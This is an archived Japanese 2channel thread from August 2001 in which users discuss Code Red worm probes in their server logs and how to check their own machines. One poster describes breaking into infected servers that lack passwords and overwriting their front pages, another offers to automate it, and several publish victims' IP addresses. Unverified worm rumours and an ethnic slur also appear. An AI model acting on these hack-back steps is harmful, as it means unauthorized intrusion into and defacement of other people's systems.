800 :内部告発:2001/08/07(火) 01:18
>>751
>>762
>>763
>>764
>>767
>>775
>>784
ニフでインターネットを理解できる人間は 10人ぐらいしかいません…
ましてや、サポセンにいる社員なんて「インターネットって何?」っていうDQNだらけッス。

スマ〜ン!(涙

801 :名無しさん@お腹いっぱい。:2001/08/07(火) 01:18
よく考えたら、これじゃバッファ溢れんと思うが

802 :名無しさん@お腹いっぱい。:2001/08/07(火) 01:19
>>801
わはははははは

803 :名無しさん@お腹いっぱい。:2001/08/07(火) 01:20
>>797
君の認識がよく分からんが、君のところのサーバーは、
200(OK)を出さないのかね?

804 :名無しさん@お腹いっぱい。:2001/08/07(火) 01:21
>>801
みなさんじっくり見てから発言しましょうね。
もちろん僕も勘違いしましたが

805 :名無しさん@お腹いっぱい。:2001/08/07(火) 01:21
>>800
内部っすか?じゃー、告発はいーから、とりあえず社内でなんとか
話まわしてチョ!!!!!!!!!!!(以下百万字) v(ToT)v

806 :名無しさん@お腹いっぱい。:2001/08/07(火) 01:23
>>792
おいおい、デコードしてみろや。ぜんぜん違うよ。
HEAD /cgi-bin/maillist.pl HTTP/1.0

807 :名無しさん@お腹いっぱい。:2001/08/07(火) 01:24
つまり、ネタでしたか。

808 :おやまぁ:2001/08/07(火) 01:25
794の姉でございます。この度は794が大変ご迷惑をかけています。
実はあの時間 794は http://207.33.111.32 にて自前のマシンを
ポートチェックをしていまして、そのLogに驚いたものだと思います。
いきなりの驚きのため、ただ今寝込んでしまいましたが、朝には叱咤して
おきますので、皆様 何卒この場はお静まり願えることを794に成り代わり
お願い申し上げます。

809 :内部告発:2001/08/07(火) 01:26
>>805
ん?書いたでしょ?
インターネットなんか知らないって!

だから「スマン」なわけ。(泣

810 :名無しさん@お腹いっぱい。:2001/08/07(火) 01:26
ドンマイ、こっちもちゃんと確認しなかった。
つーか面白い亜種出ないかな〜とか考えてたんで、つい(w

811 :名無しさん@お腹いっぱい。:2001/08/07(火) 01:27
CodeRedには笑った!ってコピペもできそうだな・・・
しかしこれってニュース板とかでもあんまり騒がれてないのが意外

812 :名無しさん@お腹いっぱい。:2001/08/07(火) 01:27
>>809
あうううぅぅぅぅぅぅぅ////(ToT)/
も、いい。寝ちゃうから・・・しくしく・・・・

813 :名無しさん@お腹いっぱい。:2001/08/07(火) 01:31
バックドアでnet sendするのは罪になるのかな?
route delete で強制的に止めるのはやっぱまずいよね。

814 :名無しさん@お腹いっぱい。:2001/08/07(火) 01:32
結構沈静化してきた・・・?
Uにも潜伏期間ってあるの?

昔、niftyのサポートの面接受けに行ったけど、
ちょっと偉そうな人が「どのようなキャリアプランをお考えで?」
って聞いてきた。プロバイダーのサポートでキャリアプランもクソも無いだろ
って思った。

815 :名無しさん@お腹いっぱい。:2001/08/07(火) 01:34
>>814
キャリアプラン ワラタ

IIは24時間置きにスリープ。中国語環境だったら48時間だけど

816 :名無しさん@お腹いっぱい。:2001/08/07(火) 01:40
ログで驚いたといえば、
xxx.xxx.xxx.xxx - 80 GET /x.ida AAAAAAAAAAAAAAAAA...
というのを見つけて、すわっ新種発生か!??と驚いたよ。

念の為、とか思って過去ログのどっかにあったチェッカーを
走らせたのを忘れていて笑ったよ。

817 :名無しさん@お腹いっぱい。:2001/08/07(火) 01:41
チャンコロはこき使うという事か・・・
台湾の人が巻き込まれているのが不埒でならねぇ

818 :名無しさん@お腹いっぱい。:2001/08/07(火) 01:44
>>817
 ピーッ、Red Card

819 :名無しさん@お腹いっぱい。:2001/08/07(火) 01:58
なんだこりゃ

202.247.109.242 - - [07/Aug/2001:01:15:52 +0900] "XXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX ?????? HTTP/1.0" 400 178

GETもHEADもついていない

820 :名無しさん@お腹いっぱい。:2001/08/07(火) 01:59
>>819
わりとガイシュツ

>>167
>>252-254

821 :名無しさん@お腹いっぱい。:2001/08/07(火) 02:03
うおー。net sendカコイイ!
その手があったねー。
ダイアルアップでひっかかってるような奴には通るだろねー。
あのダイアログ知らないと、ビビるんだよね〜(藁

822 :名無しさん@お腹いっぱい。:2001/08/07(火) 02:05
>>819
たぶんそれは、自分のDNAをコピーしそこなった突然変異とおもわれ
種無しなのでやられても赤ちゃんは生まれないよ。ちょっとだけ我慢し
て目をつぶっていればすぐ終わるから・・・

823 :名無しさん@お腹いっぱい。:2001/08/07(火) 02:07
>>821
もうこの事態下では絶対止めろとは言いにくくなっているのだが、
一応、不正な方法でのアクセスには違いないので、ビビらすような
メッセージ送るのは止めたほうが無難だな。

824 :名無しさん@お腹いっぱい。:2001/08/07(火) 02:14
メッセージ出すんだったら、素直に警告メッセージにするのが無難だろうな

825 :名無しさん@お腹いっぱい。:2001/08/07(火) 02:14
net send するぐらいなら net stop してしまえ。

826 :名無しさん@お腹いっぱい。:2001/08/07(火) 02:17
http://www.security.nl/misc/codered-stats/
が変わった。

Code Red II のほうは東アジア爆弾が描かれてないのは、
観測地点に届かないからみたいだね。

827 :名無しさん@お腹いっぱい。:2001/08/07(火) 02:18
shutdownは標準では入ってないんだよね。

828 :名無しさん@お腹いっぱい。:2001/08/07(火) 02:19
そのうちあの赤丸が地図全部を覆ったりして。

829 :名無しさん@お腹いっぱい。:2001/08/07(火) 02:20
IP: 61.208.93.99
DNS: www.ajapa.ne.jp

ここからHTTP port proveされまくってます。
反撃したいんですけど、どうしたらいいですか?

830 :名無しさん@お腹いっぱい。:2001/08/07(火) 02:24
>>829
パケットフィルタで、そこからのすべての TCP 接続要求を
無視しておけ。

831 :名無しさん@お腹いっぱい。:2001/08/07(火) 02:28
>>823
外部からnet sendするのは別に不正侵入じゃないよね。
netbiosさえ通ればメッセージ送れるわけで。
ダイアルアップ野郎には有効かと。

832 :名無しさん@お腹いっぱい。 :2001/08/07(火) 02:29
>>830
反撃だから・・・ちょっと違うかも
(というレスも・・・ちょっと板違うかも

833 :名無しさん@お腹いっぱい。:2001/08/07(火) 02:33
バックドア使わないなら問題ないだろう。
通るのかな。

834 :823:2001/08/07(火) 02:34
>>831
そうだな。Backdoor を突かずにできることをやらんとな。
とはいうものの、ここまで広がったら完全に焼け石に水
なのだが...
とにかくプロバイダにガンガン指摘して Code Red 持ちの
ホストを締め出してもらうしかないと思う。

835 :名無しさん@お腹いっぱい。:2001/08/07(火) 02:36
> このサーバーは、Windows 95 で実行されています。
> このページは、Microsoft の パーソナル Web サーバー で提供されています。
別のとこでも出てたけど、俺んとこにきた奴のページのぞいたらこんなのが…
感染するのは純粋なIISだけじゃないの? これじゃ絶滅しないよ絶対…

836 :名無しさん@お腹いっぱい。:2001/08/07(火) 02:36
>>829
whoisで責任者調べて責任者にメールすれば?
 それでもだめならOCN下のようだからOCNにメール。

837 :名無しさん@お腹いっぱい。:2001/08/07(火) 02:47
>>835
絶滅もなにも、友人で自前サーバー持ち、今回のこの騒ぎを
全然知らないでいるくらいだから、ほかにもそういう奴はごまんといる。
当分はなくならないね。

838 :名無しさん@お腹いっぱい。:2001/08/07(火) 02:47
1人5件まで、バックドア使って消して良しっていうルールありにしてくれ

839 :名無しさん@お腹いっぱい。:2001/08/07(火) 02:48
IP: 211.2.19.121
DNS: fkok026n057.ppp.infoweb.ne.jp

840 :名無しさん@お腹いっぱい。:2001/08/07(火) 02:49
IP: 24.19.94.99
DNS: c1776466-a.grapid1.mi.home.com

841 :名無しさん@お腹いっぱい。:2001/08/07(火) 02:49
IP: 24.190.66.123
DNS: ool-18be427b.dyn.optonline.net

842 :名無しさん@お腹いっぱい。:2001/08/07(火) 02:50
IP: 202.224.197.131
DNS: sirius.tenchi.ne.jp

843 :名無しさん@お腹いっぱい。:2001/08/07(火) 02:50
いかにもPPPな奴晒してもあんま意味無し。

844 :名無しさん@お腹いっぱい。:2001/08/07(火) 02:50
ウザイ

845 :名無しさん@お腹いっぱい。:2001/08/07(火) 02:50
IP晒すアホは消えんな、寝よ

846 :名無しさん@お腹いっぱい。:2001/08/07(火) 02:50
210.197.80.141

847 :名無しさん@お腹いっぱい。:2001/08/07(火) 02:51
>>835
IISに移行したけど、メッセージ書き換えるのを忘れているとかじゃないかな?
head送ってみたら?

848 :829:2001/08/07(火) 02:52
みなさん産休です

849 :名無しさん@お腹いっぱい。:2001/08/07(火) 02:54
いい加減に気付けよ、佐賀の○○学園! と思って検索かけたら
> <セクハラ>佐賀短大助教授を停職処分 女子大生に言葉で
こんなとこかぁ…

850 :匿名希望:2001/08/07(火) 02:54
暇なのでやってみよう。CodeREDウザイので、まずlogからIPひらってIISの稼働を見る。
くたばってなかったら、おもむろにエクスプローラから、Webフォルダーを開き、追加する。http://アホなIPで馬鹿管理者がパスワードも無しであればWebルートへ入れる。
default.htmとかindex.htm,index.html等を作りコピーして置く。topページで簡単に置ける。
It is committed by CodeRED. Please do not send a packet to me. Management is random. Please intercept a power supply.
ここへlogを張りつける。
よめ!
http://www.eeye.com/html/Research/Tools/codered.html
ってな感じ。
これってクラックかい? しょうがないじゃん。。。啓蒙活動としてとってほしいな。
しかし面白いくらい入れるぞ。10%以上の確率だ。

851 :名無しさん@お腹いっぱい。:2001/08/07(火) 02:55
CodeRedが人間にも感染したらしい。

852 :名無しさん@お腹いっぱい。:2001/08/07(火) 02:57
自分のサイトって自分では見ないよね。

853 :名無しさん@お腹いっぱい。:2001/08/07(火) 02:58
>>850
ほんとにやっちまっていいのかね。それなら手動で
いちいちHTML置いたりしないで、うちにリクエスト送ってきた
鯖は、全部自動で応急処置しちまうんだが。

854 :ヴァカ管理者:2001/08/07(火) 03:00
>>850
ほんとにアホな奴が管理者やってるんだよね〜困るYO!。
CodeREDウザイ、本当に氏んでくれ。

855 :名無しさん@お腹いっぱい。:2001/08/07(火) 03:01
書き換えるのは器物破損になるね。
せいぜいnet sendぐらいにしておくんだね。

856 :名無しさん@お腹いっぱい。:2001/08/07(火) 03:02
>>853
足つくし、よしとけって。

857 :名無しさん@お腹いっぱい。:2001/08/07(火) 03:02
ふ〜む、さっきから聞いてはいたが、net sendってのは
なんだい?NT系のコマンド?

858 :名無しさん@お腹いっぱい。:2001/08/07(火) 03:03
>>857
u*nixでいう、writeコマンドですね。画面にメッセージ出す。

859 :名無しさん@お腹いっぱい。:2001/08/07(火) 03:04
NET SEND {名前 | * | /DOMAIN[:名前] | /USERS} メッセージ

NET SEND は、ネットワーク上のほかのユーザー、コンピュータ、または
メッセージ宛先名にメッセージを送信します。メッセージを受信するには、
Messenger サービスが開始されていなければなりません。

メッセージを送信できるのは、ネットワーク上でアクティブな名前に対して
だけです。ユーザー名にメッセージを送信する場合、そのユーザーがメッセージ
を受信するためには、ログオンして Messenger サービスが開始されていなければ
なりません。

名前
メッセージを送信するユーザー名、コンピュータ名、またはメッセージ宛先名
を指定します。名前が空白文字を含むコンピュータ名の場合、エイリアスは
二重引用符 (" ") で囲みます。
*
グループ内のすべての名前に対してメッセージを送信します。
/DOMAIN[:名前]
ワークグループまたはドメイン内のすべての名前に対してメッセージを送信
します。名前が指定されている場合は、指定されたドメインまたはワーク
グループ内のすべての名前に対してメッセージを送信します。
/USERS
サーバーに接続しているすべてのユーザーに対してメッセージを送信します。
メッセージ
メッセージとして送信するテキストを指定します。

860 :名無しさん@お腹いっぱい。:2001/08/07(火) 03:05
なるほどね。確かに応急処置も訴えられたらまずいしな・・・
NT使ってれば、そのnet sendを自動で返信してやる
スクリプトを書くんだが。詳細がわからんことには書けん

861 :名無しさん@お腹いっぱい。:2001/08/07(火) 03:07
>>860
net send <計算機名> <メッセージ> を自分のCGIで呼べばよいが、
NETBIOSが届くこと前提。やってみたことないからわからん。

862 :名無しさん@お腹いっぱい。:2001/08/07(火) 03:09
>>861
自己レスだが、ふつうはルータでNETBIOSちょんぎっているから、
PPP常時接続野郎にしか通用しないかも。

863 :860:2001/08/07(火) 03:10
いや、Win98なんでね。しかも鯖立て禁止のJ-COMだから、
ハニーポット書くことぐらいしかできん。つーかNetBIOS使う
net ***系のコマンドか・・・ちょっと単純にソケットで送るのは
厳しそうだ(俺には)
つーことで素直に寝るよ。明日も仕事だし

864 :匿名希望:2001/08/07(火) 03:23
いやぁ、既に流れてしまってたりして慌てるが、一応管理者判ったんで
メールしてごめんなしてきた。topページからいきなりジャンプするページだったんで
普通じゃ気づかないのかなと思ってさ。
>>862
しかしね、そのNETBIOSちょんぎってないのが実に多いのよ、実際。
ポート塞いでてもFrontPageとかで直接編集できたりしてさ。
Administrator、パスワード無しって感じだわ。

865 :名無しさん@お腹いっぱい。:2001/08/07(火) 03:27
http://slashdot.jp/comments.pl?sid=01/08/05/0441253&cid=126

866 :862:2001/08/07(火) 03:34
>>864

メールでナシがつくなら安心。

>しかしね、そのNETBIOSちょんぎってないのが実に多いのよ、実際。
>ポート塞いでてもFrontPageとかで直接編集できたりしてさ。
>Administrator、パスワード無しって感じだわ。

え〜〜。
デフォのほったらかしでなくて、サーバで立ててるつもりでそれじゃあ、絶句もんだよなあ。

この騒動の諸悪の根源、そんなとこばっかりなんか・・・

#反動で変な法規制ができたりしないこと望む!!

867 :名無しさん@お腹いっぱい。:2001/08/07(火) 03:37
>>865
あらら、早いっすね。
手動でnet send叩いたら、自分のFWではじかれた→NETBIOS (藁

868 :名無しさん@お腹いっぱい。:2001/08/07(火) 03:53
自分のPCでIISが動いてるかどうか分かる方法ってあるんですか?
自分で入れた覚えはないんですが、何かソフトを入れた時に
一緒に入ることもあるような書き方なんで<MSサイト

869 :名無しさん@お腹いっぱい。:2001/08/07(火) 04:00
http://localhost
でどうかな。

870 :名無しさん@お腹いっぱい。:2001/08/07(火) 04:02
>>869
クリックするとNetscape.co.jpで「localhost」を検索した結果が出るんですが・・・。
ネスケ入れてないのに。

871 :名無しさん@お腹いっぱい。:2001/08/07(火) 04:04
>>870

じゃ、http://127.0.0.1 でど〜ぞ。

872 :名無しさん@お腹いっぱい。:2001/08/07(火) 04:05
>>871
やってみました。「表示するページなし」になったんで大丈夫ってことですかね。

873 :名無しさん@お腹いっぱい。:2001/08/07(火) 04:06
それはlocalhostで繋がらなかったから自動検索に行ったんだろう。
IEのツール、オプション、詳細設定で、アドレスバーからの検索
で検索する設定になっていると思われ。

874 :名無しさん@お腹いっぱい。:2001/08/07(火) 04:06
それなら大丈夫ってことじゃない?
念のためにシマンテックがだ出してるCodeRed感染チェッカ?みたいので確認するともっといい。

875 :名無しさん@お腹いっぱい。:2001/08/07(火) 04:07
>>872

おっけー。
あー、平和な気がする(まだBlackICEがぴこぴこ言うとるが)

876 :868:2001/08/07(火) 04:11
皆さんありがとうございました。
共有切ってたはずのドライブの共有がいつの間にかONになってたんで
びくびくしてました(笑
ウイルスチェックでも何も出てこないからたぶん何事もなかったんだろうと思います。

877 :名無しさん@お腹いっぱい。:2001/08/07(火) 05:50
>>868
タスクマネージャのプロセスタブを見て、Inetinfo.exeがあればIISが動いてる。
なければ動いていない。

878 :ななし:2001/08/07(火) 05:57
(8/6)新ウイルス「コード・レッド」、日本で数千台感染・IPA推測
 サーバーに感染する新種ウイルス「コード・レッド」に、6日までに日本国内で数千台のサーバーが感染したとの見方を、経済産業省の外郭団体の情報処理振興事業協会(IPA)が明らかにした。サーバーへのハッカーの不正侵入を助ける悪質な機能をもった変種が出回っていることも分かった。
 コード・レッドの感染行動は1日から全世界で始まりIPAへの国内の感染報告は6日まで3件だが、「様々な情報を総合すると国内で数千台のサーバーが感染している可能性が高い」(セキュリティセンター)という。

 変種の「コード・レッド2」が感染したサーバーのプログラムには「バックドア」と呼ばれるセキュリティー上の弱点が生じる。ハッカーはこの弱点を悪用してホームページ経由で簡単にサーバーに侵入し、サイトを改ざんしたり企業の内部情報を盗み出すことが可能になるという。

 「2」が感染したサーバーは基本ソフト(OS)を再インストール(組み込み)しなければならず、回復にも時間がかかるという。従来のコード・レッドはマイクロソフトのOS「ウィンドウズNT」「同2000」を搭載したサイト用サーバーに感染する。感染した場合、サーバーの電源を切りOSのプログラムの一部欠陥を修正すれば良いとされていた。
http://it.nikkei.co.jp/it/sp9/sp9Ch.cfm?id=20010806dahi266606

879 :名無しさん@お腹いっぱい。:2001/08/07(火) 06:08
なんか思いっきり乗り遅れてる気がするけど、うちのノートン何も言わないだけど…
普通はくるものなの?

880 :名無しさん@お腹いっぱい。:2001/08/07(火) 06:09
俺の使ってるCATVから今更注意を促すメールが届いた…遅すぎです(;´Д`)

881 :そりゃまぁ:2001/08/07(火) 06:15
色んな情報が集まる2chが一番速いと思うぜ。マジで。
ネタ、嘘もあるけど慣れれば最高です輪。
ニュース系のweb、ワクチンメーカー、全て遅すぎ。
逝けって言いたくなる。

882 :名無しさん@お腹いっぱい。:2001/08/07(火) 06:17
>>879
うちのノートンも静かだけど、イベントログを見ると来てるみたい

>>880
来るだけマシです。。。

883 :名無しさん@お腹いっぱい。:2001/08/07(火) 06:21
>>882
えっそうなの?警告にすら表示なしなんだけど…ちゃんとアップデートはしてるのに

884 :名無しさん@お腹いっぱい。:2001/08/07(火) 06:35
ここから XXXXがきた siamitmall.com
http://siamitmall.com
なにジン?
あと、左上のタワーは怪しいね
確信犯かな?オレみたい(w

885 :名無しさん@お腹いっぱい。:2001/08/07(火) 06:52
これにかかったらどんな症状が出るんだ?

886 :名無しさん@お腹いっぱい。:2001/08/07(火) 07:08
>>885
発熱(40℃前後)、激しい下痢、嘔吐など

887 :名無しさん@お腹いっぱい。:2001/08/07(火) 07:10
Code redIIはバックドアを作るところまで
基本的にAdmin権限取られるのでやろうと思えば何でも出来る

888 :名無しさん@お腹いっぱい。 :2001/08/07(火) 07:12
>>878
感染しちゃったら、やっぱり
>「2」が感染したサーバーは基本ソフト(OS)を再インストール
>(組み込み)しなければならず、回復にも時間がかかるという。
しないといけないのかな?root.exeつぶしだけじゃ危険?
もちろん亜種発生→root.exeの名前が変わるってことはありえるけど

889 :名無し:2001/08/07(火) 07:14
またまた新型コードレッドの噂が流れてますが?

890 :名無しさん@お腹いっぱい。:2001/08/07(火) 07:21
冷却ファンを停止するらしいね

891 :名無しさん@お腹いっぱい。:2001/08/07(火) 07:23
>>890 マジ?

892 :名無しさん@お腹いっぱい。:2001/08/07(火) 07:30
なーんか dns.***.tw ってとこから来たんだけどおっかねー。

893 :名無し:2001/08/07(火) 07:39
481 名前:まじかよ・・・ 投稿日:2001/08/07(火) 06:58 ID:8SLJMgNE
「Hunmer Red」って新種のウィルスか?
今朝配信受けたけど、Pc-Cillinの検出Passしやがった。
「Good Luck」っていうコメントが出た!!
今のところ症状無し。

894 :名無しさん@お腹いっぱい。:2001/08/07(火) 07:50
めちゃくちゃ基礎的なことなんですが・・・ログってどうやって見るんですか?

895 :名無しさん@お腹いっぱい。:2001/08/07(火) 08:06
フォースを使うのだよルークス!

896 :名無しさん@お腹いっぱい。:2001/08/07(火) 08:53
WINNT\system32\LogFiles\W3SVC1

897 :名無しさん@お腹いっぱい。:2001/08/07(火) 09:02
8時50分からアクセスなくなったんだけどこれは一体...

898 :名無しさん@お腹いっぱい。:2001/08/07(火) 09:04
出勤したんだよ。

899 :名無しさん@お腹いっぱい。:2001/08/07(火) 09:46
>>803
797じゃないけど Apache で default.ida なんかなくても
200 を返すのは正常なの?

900 :名無しさん@お腹いっぱい。:2001/08/07(火) 09:59
リクエストが - だけのが来てるんだけどこれも Code Red かな。
あるサイトから 100 件ほど XXXX でアクセスがあったあとに
ちょこちょことあったりする。あんまり数は多くないけど。

901 :名無しさん@お腹いっぱい。:2001/08/07(火) 10:02
こういう時は、変な噂も流れやすいから注意しようや。

902 :名無しさん@お腹いっぱい。:2001/08/07(火) 10:19
http://www.jpix.co.jp/Japanese/Japanese%20Html/J_index.htm

JPIXのトラヒック。
この赤いのって・・・。

903 :名無しさん@お腹いっぱい。:2001/08/07(火) 10:36
900超えたけどどうする?
もう一つの Code Red スレと多少方向性違うので
Part II 立ててもいいと思うのだが。

904 :名無しさん@お腹いっぱい。:2001/08/07(火) 10:43
>>903
スレ立て賛成

905 :名無しさん@お腹いっぱい。:2001/08/07(火) 10:44
>>903
サンセーイ.

906 :名無しさん@お腹いっぱい。:2001/08/07(火) 11:16
>>900
もしかしてサーバーの応答コードは408?

907 :名無しさん@お腹いっぱい。:2001/08/07(火) 11:17
新スレ立てました
「コードレッド (Code Red) 逝ってヨシ」
http://ton.2ch.net/test/read.cgi?bbs=sec&key=997150588

908 :名無しさん@お腹いっぱい。:2001/08/10(金) 14:43
203.246.48.82
開けてみたら韓国のベンチャー企業、しかもOSを取り扱ってる。
韓国人の友達を通して「ふざけんな」とメールして貰った。

909 :名無しさん@お腹いっぱい。:2001/08/10(金) 14:44
203.246.48.82
開けてみたら韓国のベンチャー企業、しかもOSを取り扱ってる。
韓国人の友達を通して「ふざけんな」とメールして貰った。

910 :名無しさん@お腹いっぱい。:2001/08/10(金) 14:52
>>908-909
>>907は読んだ?

207 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)